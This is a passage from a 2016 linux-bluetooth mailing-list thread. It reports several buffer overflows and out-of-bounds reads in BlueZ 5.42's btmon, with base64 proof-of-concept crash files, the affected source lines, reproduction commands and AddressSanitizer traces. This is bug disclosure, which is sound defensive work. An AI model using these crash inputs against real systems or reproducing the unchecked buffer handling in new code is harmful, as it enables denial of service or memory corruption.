#6 0x705420199b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x79fe1636c7e2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:3744 packet_hexdump
Shadow bytes around the buggy address:
0x0f4042c658a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f4042c658b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f4042c658c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f4042c658d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f4042c658e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0f4042c658f0: 00 00 00 00 00 00 00 00 00 00 00 00[02]f4 f3 f3
0x0f4042c65900: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f4042c65910: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00
0x0f4042c65920: 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00
0x0f4042c65930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f4042c65940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==13306==ABORTING
[-- Attachment #4: pklg_read_hci_BO.txt --]
[-- Type: text/plain, Size: 5837 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "pklg_read_hci" function in "btsnoop.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AAAQABkQAKLNFQCAAgICFwIXAAEABU5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5O
Tk5OTqGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh
oU5OTk5OTk5OTk5OTk5dTgAAdXV1dXV1dXV1dXV1dXV1MyQ+Plj7AbrYA4QBABIgPj08Gjq6AAME
AQC62AMEAQAwPkc+WgABABAD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAECPlNOA
AAEAEj5NPlgC/4AA9gQBABI+PgEAAAC6AAMEAT4+AQAAALoAAwQB/3///z5YAAEfAA7mAQA+CAQa
Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+PlgaPrrY
AwQBACKdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBADMkPj5YAAG62AOEAQAS
ID49PBo6ugADBAEAutgDBAEAMD5HPloAAQAQA9wBAD4ABBo+Lj66ABAfAAPmAQABAAQWcHBwcHBw
cP//f/9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT71PT09PT4D/T09PT09PD09P
T09PT09PT09PT09PT09PT09PT09PT09PT09RT09PUk9PT09PT09PT09PT09PT0////8ABAkEAiAA
KgUZEACizRUVNAICABI+PgEAAAC6CQMEAf9///8+WAABHwAO5gEAPggEGj4aPrrYAwQBAE0+Pj5Y
AAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwT1ABI+Pj5YGj662AMEAQBDnQAAAQA+CAQa
Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+PlgaPrrY
AwQBAEOdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBABgaProAAwQBABIkPj5Y
Gj662AMEAQD/fwAADBo+AAAAAQEAMyQ+PlgAAbrYA4QBABIgPj08Gjq6AAMEDwC62AMEAQAwPkc+
WgABABwD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAEBPT09PT09PT09PT09PT09P
T09PT09PT08DhAEAEiA+PTwaOroAAwQBALrYAwQBADA+Rz5aAAEAEAPcAQA+j5TTgAABABI+TT5Y
Av+AAPYEAQASPj4BAAAAugADBAEAED4+PlgWAR8ADuYBAD4IBBo+Gj662E5OTk5OTk5dTk51dXV1
dXV1dXV1dXV1dXV1dXV1dXV1dXVOTk5OTk5OTk5OTk5OTk5OTk5OTugLAAAC////fwIXAAGA////
AAQJBAIgACoFGRAAnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ1AnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ0AAAC6AAMEAQAQPj4+WAABH09PT09P
T09PT08PT09PT09PT09PT09PT09PT09PT09PT3BwcHBwcJJwcHBwiHBwcHDucHBwcHBwcHBwcHBw
cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwEHBwcHBwcHBwcHBwcHBwcHBwT3Bw
cAIgACoFGRAAos0VFTQCAgAgPj4BAAAAugADBAH/f///PlgAAR8ADuYBAD4IBHBwPgAZGj5wcHBw
cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBoADuYBAD4IBHBwPgAZGj5wcHBw
cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBo+ugADBAEAEiA+Plj///9/EAQB
ABI+TVgGProAAwQBABI+Pj5YJAAQQA==
Affected code:
368 *index = 0xffff;
369 *opcode = 0xffff;
370 break;
371 }
372
373 len = read(btsnoop->fd, data, toread);
374 if (len < 0) {
375 btsnoop->aborted = true;
376 return false;
377 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
=================================================================
==1986==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x73f4d87b94c2 at pc 0x663b1aef59b6 bp 0x73f4d87b8c50 sp 0x73f4d87b8c38
WRITE of size 1491 at 0x73f4d87b94c2 thread T0
#0 0x663b1aef59b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
#1 0x544a17 in pklg_read_hci src/shared/btsnoop.c:373
#2 0x544a17 in btsnoop_read_hci src/shared/btsnoop.c:433
#3 0x417efd in control_reader monitor/control.c:1408
#4 0x40a142 in main monitor/main.c:220
#5 0x663b1a933b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#6 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x73f4d87b94c2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 read
Shadow bytes around the buggy address:
0x0e7f1b0ef240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0e7f1b0ef290: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
0x0e7f1b0ef2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
0x0e7f1b0ef2b0: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef2c0: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0e7f1b0ef2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==1986==ABORTING
[-- Attachment #5: print_hex_field_OOB.txt --]
[-- Type: text/plain, Size: 4023 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A out-of-bound read was identified in "print_hex_field" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AAAADCQkLv9/AIAAARUB3QAAAAwdJCT/f4gAAQE=
Affected code:
1908 static void print_hex_field(const char *label, const uint8_t *data,
1909 uint8_t le n)
1910 {
1911 char str[len * 2 + 1];
1912 uint8_t i;
1913
1914 str[0] = '\0';
1915
1916 for (i = 0; i < len; i++)
1917 sprintf(str + (i * 2), "%2.2x", data[i]);
1918
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==17737==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x77c32d2411a2 at pc 0x431421 bp 0x77c32d240700 sp 0x77c32d2406f8
READ of size 1 at 0x77c32d2411a2 thread T0
#0 0x431420 in print_hex_field monitor/packet.c:1917
#1 0x44428d in print_key monitor/packet.c:1924
#2 0x44428d in print_link_key monitor/packet.c:1929
#3 0x44428d in return_link_keys_evt monitor/packet.c:7803
#4 0x47d5f8 in packet_hci_event monitor/packet.c:9072
#5 0x483025 in packet_monitor monitor/packet.c:3843
#6 0x417f68 in control_reader monitor/control.c:1415
#7 0x40a142 in main monitor/main.c:220
#8 0x74bb760f0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#9 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x77c32d2411a2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:1917 print_hex_field
Shadow bytes around the buggy address:
0x0ef8e5a401e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ef8e5a401f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ef8e5a40200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ef8e5a40210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ef8e5a40220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ef8e5a40230: 00 00 00 00[02]f4 f3 f3 f3 f3 00 00 00 00 00 00
0x0ef8e5a40240: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00
0x0ef8e5a40250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 f3
0x0ef8e5a40260: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ef8e5a40270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ef8e5a40280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==17737==ABORTING
^ permalink raw reply [flat|nested] 8+ messages in thread* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 11:51 ` op7ic \x00
@ 2016-11-15 12:01 ` Johan Hedberg
2016-11-15 12:12 ` op7ic \x00
0 siblings, 1 reply; 8+ messages in thread
From: Johan Hedberg @ 2016-11-15 12:01 UTC (permalink / raw)
To: op7ic \x00
Cc: François Beaufort, Luiz Augusto von Dentz,
linux-bluetooth@vger.kernel.org
Hi op7ic,
Is there any chance that you could try convert these to actual patches
to fix the issues?
Johan
On Tue, Nov 15, 2016, op7ic \x00 wrote:
> here are 4 crashes resulting in either out-of-bound reads or buffer
> overflows (see attached) but this time in btmon. They are pretty much
> similar to bugs reported previously.
>
> On Tue, Nov 15, 2016 at 10:51 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> > I got couple in btmon and I started looking at BO's in btmon too.
> >
> > FWIW whenever the code base is shared similar bugs will appear. You
> > notice that a lot of BO issues reported are for example due to
> > unchecked memcpy or just lack of boundary verification on arrays etc .
> > Once you hit that point same bug appears.
> >
> >
> >
> >
> > On Tue, Nov 15, 2016 at 10:41 AM, François Beaufort
> > <beaufort.francois@gmail.com> wrote:
> >> FWIW, I have been witnessing btmon buffer overflows this morning but
> >> can't reproduce anymore.
> >>
> >> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> >>> alright will do - thanks for replying.
> >>>
> >>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
> >>> <luiz.dentz@gmail.com> wrote:
> >>>> Hi,
> >>>>
> >>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
> >>>>> Hello list,
> >>>>>
> >>>>> I have been playing with hcidump tool recently and came across
> >>>>> following bugs coming from either out-of-bound reads or buffer
> >>>>> overflows (see attached reports).
> >>>>>
> >>>>> There are couple more I`m working on and will send these later.
> >>>>
> >>>> I guess we want these to be tested against btmon, hcidump is a deprecated.
> >>>>
> >>>> --
> >>>> Luiz Augusto von Dentz
> >>> --
> >>> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
> >>> the body of a message to majordomo@vger.kernel.org
> >>> More majordomo info at http://vger.kernel.org/majordomo-info.html
> Machine: x86_64
> OS: linux-gnu
> Compiler: gcc
> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
> Machine Type: x86_64-unknown-linux-gnu
> BlueZ Version: 5.42
> Release Status: release
> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>
> Description:
>
> A buffer overflow was identified in "l2cap_packet" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>
> ./monitor/btmon -r <PoC File>
>
>
> PoC.file base64 encoded:
>
> AAAAGAOEAAAAABAAAAMAEAkjChgAAwP7AgMDAxADEBAJIwoYAAMD+wIDAwMQAxAAAwMDAA==
>
>
>
> Affected code:
>
> 3161 index_list[index][in].frag_buf = malloc(len);
> 3162 if (!index_list[index][in].frag_buf) {
> 3163 print_text(COLOR_ERROR, "failed buffer allocation") ;
> 3164 packet_hexdump(data, size);
> 3165 return;
> 3166 }
> 3167
> 3168 memcpy(index_list[index][in].frag_buf, data, size);
> 3169 index_list[index][in].frag_pos = size;
> 3170 index_list[index][in].frag_len = len - size;
> 3171 index_list[index][in].frag_cid = cid;
> 3172 break;
>
>
>
> Repeat-By:
> echo <above base64> > PoC.64
> base64 -d PoC.b64 > PoC.file
> valgrind ./monitor/btmon -r PoC.file
>
>
> ASAN Report (bluez needs to compiled with -fsanitize=address for this):
>
> =================================================================
> ==27023==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x76cf40a9c2c2 at pc 0x679d7a177792 bp 0x76cf40a9b830 sp 0x76cf40a9aff0
> READ of size 4095 at 0x76cf40a9c2c2 thread T0
> < HCI Command: Unknown (0x00|0x0003) plen 16 [hci0] 0.004096
> 09 23 0a 18 00 03 03 fb 02 03 03 03 .#..........
> < ACL Data TX: Handle 771 flags 0x00 dlen 4099 [hci0] 94308888.197627
> #0 0x679d7a177791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
> #1 0x4b9ecc in l2cap_packet monitor/l2cap.c:3168
> #2 0x47dda6 in packet_hci_acldata monitor/packet.c:9115
> #3 0x483777 in packet_monitor monitor/packet.c:3846
> #4 0x417f68 in control_reader monitor/control.c:1415
> #5 0x40a142 in main monitor/main.c:220
> #6 0x679d79bb0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
> #7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>
> Address 0x76cf40a9c2c2 is located in stack of thread T0 at offset 1778 in frame
> #0 0x417b4f in control_reader monitor/control.c:1375
>
> This frame has 5 object(s):
> [32, 34) 'pktlen'
> [96, 98) 'index'
> [160, 162) 'frequency'
> [224, 240) 'tv'
> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
> (longjmp and C++ exceptions *are* supported)
> SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
> Shadow bytes around the buggy address:
> 0x0eda6814b800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> =>0x0eda6814b850: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
> 0x0eda6814b860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
> 0x0eda6814b870: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b880: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0eda6814b8a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> Shadow byte legend (one shadow byte represents 8 application bytes):
> Addressable: 00
> Partially addressable: 01 02 03 04 05 06 07
> Heap left redzone: fa
> Heap right redzone: fb
> Freed heap region: fd
> Stack left redzone: f1
> Stack mid redzone: f2
> Stack right redzone: f3
> Stack partial redzone: f4
> Stack after return: f5
> Stack use after scope: f8
> Global redzone: f9
> Global init order: f6
> Poisoned by user: f7
> Contiguous container OOB:fc
> ASan internal: fe
> ==27023==ABORTING
> Machine: x86_64
> OS: linux-gnu
> Compiler: gcc
> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
> Machine Type: x86_64-unknown-linux-gnu
> BlueZ Version: 5.42
> Release Status: release
> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>
> Description:
>
> A out-of-bound read was identified in "packet_hexdump" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>
> ./monitor/btmon -r <PoC File>
>
>
> PoC.file base64 encoded:
> AACACQQHGAAaERDoAwAAAAkjBxgAAwMDAwMDAwMDAwMDAwMDAwMDAw==
>
>
> Affected code:
>
> 3736 static const char hexdigits[] = "0123456789abcdef";
> 3737 char str[68];
> 3738 uint16_t i;
> 3739
> 3740 if (!len)
> 3741 return;
> 3742
> 3743 for (i = 0; i < len; i++) {
> 3744 str[((i % 16) * 3) + 0] = hexdigits[buf[i] >> 4];
> 3745 str[((i % 16) * 3) + 1] = hexdigits[buf[i] & 0xf];
> 3746 str[((i % 16) * 3) + 2] = ' ';
>
>
>
> Repeat-By:
> echo <above base64> > PoC.64
> base64 -d PoC.b64 > PoC.file
> valgrind ./monitor/btmon -r PoC.file
>
>
> ASAN Report (bluez needs to compiled with -fsanitize=address for this):
>
> ==13306==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x79fe1636c7e2 at pc 0x42cb3c bp 0x79fe1636bca0 sp 0x79fe1636bc98
> READ of size 1 at 0x79fe1636c7e2 thread T0
> > ACL Data RX: Handle 0 flags 0x00 dlen 2304 [hci0] 0.437326056
> invalid packet size (32764 != 2304)
> 23 07 18 00 03 03 03 03 03 03 03 03 03 03 03 03 #...............
> 03 03 03 03 03 03 03 00 00 00 00 00 20 08 82 40 ............ ..@
> 00 28 80 20 00 00 00 00 40 01 40 23 00 00 00 00 .(. ....@.@#....
> a0 04 20 00 00 00 00 00 00 04 00 80 00 00 00 00 .. .............
> 00 00 10 04 ff ff ff ff 04 01 04 86 9a 39 1c 20 .............9.
> 54 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Tp..............
> 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
> ff ff ff ff 04 00 00 00 4c 00 00 00 00 00 00 00 ........L.......
> 00 00 00 00 9a 39 1c 20 54 70 00 00 00 00 00 00 .....9. Tp......
> 00 00 00 00 56 98 54 00 00 00 00 00 80 c8 36 00 ....V.T.......6.
> 00 00 00 00 1b 00 00 00 00 00 00 00 59 98 54 00 ............Y.T.
> 00 00 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .......!Tp....2.
> 54 70 00 00 62 53 61 21 54 70 00 00 00 00 00 00 Tp..bSa!Tp......
> 00 00 00 00 74 78 61 21 54 70 00 00 80 c5 36 16 ....txa!Tp....6.
> fe 79 00 00 00 b0 82 21 54 70 00 00 00 00 00 00 .y.....!Tp......
> 00 00 00 00 08 00 00 00 30 00 00 00 50 c8 36 16 ........0...P.6.
> fe 79 00 00 90 c7 36 16 fe 79 00 00 50 f8 1d 20 .y....6..y..P..
> 54 70 00 00 a0 e2 51 20 54 70 00 00 00 00 00 00 Tp....Q Tp......
> 00 00 00 00 00 00 00 00 00 00 00 00 18 c8 36 16 ..............6.
> fe 79 00 00 17 c8 36 16 fe 79 00 00 34 c3 36 16 .y....6..y..4.6.
> fe 79 00 00 00 00 00 00 00 00 00 00 00 00 00 91 .y..............
> 6d 2c fc f3 01 00 00 00 00 00 00 00 80 c5 36 16 m,............6.
> fe 79 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .y.....!Tp....2.
> 54 70 00 00 00 00 e0 85 6d 2c fc f3 00 00 c2 f0 Tp......m,......
> c2 42 a8 e0 00 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
> fe 79 00 00 b8 79 82 21 54 70 00 00 51 45 52 20 .y...y.!Tp..QER
> 54 70 00 00 00 00 40 86 6d 2c fc f3 00 00 c2 f0 Tp....@.m,......
> c2 42 a8 e0 06 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
> fe 79 00 00 05 16 62 21 54 70 00 00 89 53 74 20 .y....b!Tp...St
> 54 70 00 00 c8 86 81 21 54 70 00 00 01 00 00 00 Tp.....!Tp......
> 00 00 00 00 80 c8 36 16 fe 79 00 00 98 86 81 21 ......6..y.....!
> 54 70 00 00 9b 5b 61 21 54 70 00 00 00 00 01 00 Tp...[a!Tp......
> 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 ................
> 01 00 00 00 35 63 61 21 54 70 00 00 01 00 00 00 ....5ca!Tp......
> fe 79 00 00 00 80 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
> 00 00 00 00 28 ea 9c 20 54 70 00 00 68 0a 73 20 ....(.. Tp..h.s
> 54 70 00 00 b5 55 61 21 54 70 00 00 01 00 00 00 Tp...Ua!Tp......
> fe 79 00 00 d8 99 81 21 54 70 00 00 30 c4 36 16 .y.....!Tp..0.6.
> fe 79 00 00 1c 1c 61 21 54 70 00 00 a8 e8 9c 20 .y....a!Tp.....
> 54 70 00 00 1c 1c 61 21 54 70 00 00 03 00 00 00 Tp....a!Tp......
> 00 00 00 00 2e 03 31 1c 00 00 00 00 03 00 00 00 ......1.........
> 00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
> 54 70 00 00 8e 25 61 21 54 70 00 00 28 bd 17 20 Tp...%a!Tp..(..
> 54 70 00 00 00 c5 36 16 fe 79 00 00 28 bd 17 20 Tp....6..y..(..
> 54 70 00 00 48 c1 17 20 54 70 00 00 10 c6 36 16 Tp..H.. Tp....6.
> fe 79 00 00 0c c4 70 00 00 00 00 00 00 c6 36 16 .y....p.......6.
> fe 79 00 00 80 87 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
> 00 00 00 00 80 87 81 21 54 70 00 00 00 a0 81 21 .......!Tp.....!
> 54 70 00 00 04 14 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
> 54 70 00 00 70 0a 40 00 00 00 00 00 00 00 00 00 Tp..p.@.........
> 01 00 00 00 2c 00 00 00 01 00 00 00 90 c6 36 16 ....,.........6.
> fe 79 00 00 80 87 81 21 54 70 00 00 a0 c6 36 16 .y.....!Tp....6.
> fe 79 00 00 00 b5 82 21 54 70 00 00 c8 c6 36 16 .y.....!Tp....6.
> fe 79 00 00 a8 b1 82 21 54 70 00 00 01 00 00 00 .y.....!Tp......
> 00 00 00 00 3d 27 61 21 54 70 00 00 00 00 00 00 ....='a!Tp......
> 00 00 00 00 80 87 81 21 54 70 00 00 01 00 00 00 .......!Tp......
> 54 70 00 00 00 00 00 00 00 00 00 00 01 00 00 00 Tp..............
> 00 00 00 00 a8 b1 82 21 54 70 00 00 03 00 00 00 .......!Tp......
> 00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
> 54 70 00 00 8e 25 61 21 54 70 00 00 00 00 00 00 Tp...%a!Tp......
> 00 00 00 00 00 b5 82 21 54 70 00 00 10 c6 36 16 .......!Tp....6.
> fe 79 00 00 00 c6 36 16 fe 79 00 00 2e 03 31 1c .y....6..y....1.
> 00 00 00 00 04 14 40 00 00 00 00 00 ff ff ff ff ......@.........
> 00 00 00 00 20 0f 40 00 00 00 00 00 48 c1 17 20 .... .@.....H..
> 54 70 00 00 00 a0 81 21 54 70 00 00 00 a0 81 21 Tp.....!Tp.....!
> 54 70 00 00 da 15 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
> 54 70 00 00 38 03 40 00 00 00 00 00 00 00 00 00 Tp..8.@.........
> 01 00 00 00 54 02 00 00 01 00 00 00 01 00 00 00 ....T...........
> 00 00 00 00 80 87 81 21 54 70 00 00 b0 c7 36 16 .......!Tp....6.
> fe 79 00 00 00 b5 82 21 54 70 00 00 d8 c7 36 16 .y.....!Tp....6.
> fe 79 00 00 e8 56 7d 00 00 00 00 00 00 00 00 00 .y...V}.........
> 00 00 00 00 00 00 00 00 00 00 00 00 f0 ef 00 00 ................
> 20 60 00 00 00 00 00 00 00 00 00 00 00 c8 36 16 `............6.
> fe 79 00 00 c7 6d 61 21 54 70 00 00 01 00 00 00 .y...ma!Tp......
> : #0 0x42cb3b in packet_hexdump monitor/packet.c:3744
> #1 0x47dd2b in packet_hexdump monitor/packet.c:3740
> #2 0x47dd2b in packet_hci_acldata monitor/packet.c:9108
> #3 0x483752 in packet_monitor monitor/packet.c:3849
> #4 0x417f68 in control_reader monitor/control.c:1415
> #5 0x40a142 in main monitor/main.c:220
> #6 0x705420199b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
> #7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>
> Address 0x79fe1636c7e2 is located in stack of thread T0 at offset 1778 in frame
> #0 0x417b4f in control_reader monitor/control.c:1375
>
> This frame has 5 object(s):
> [32, 34) 'pktlen'
> [96, 98) 'index'
> [160, 162) 'frequency'
> [224, 240) 'tv'
> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
> (longjmp and C++ exceptions *are* supported)
> SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:3744 packet_hexdump
> Shadow bytes around the buggy address:
> 0x0f4042c658a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
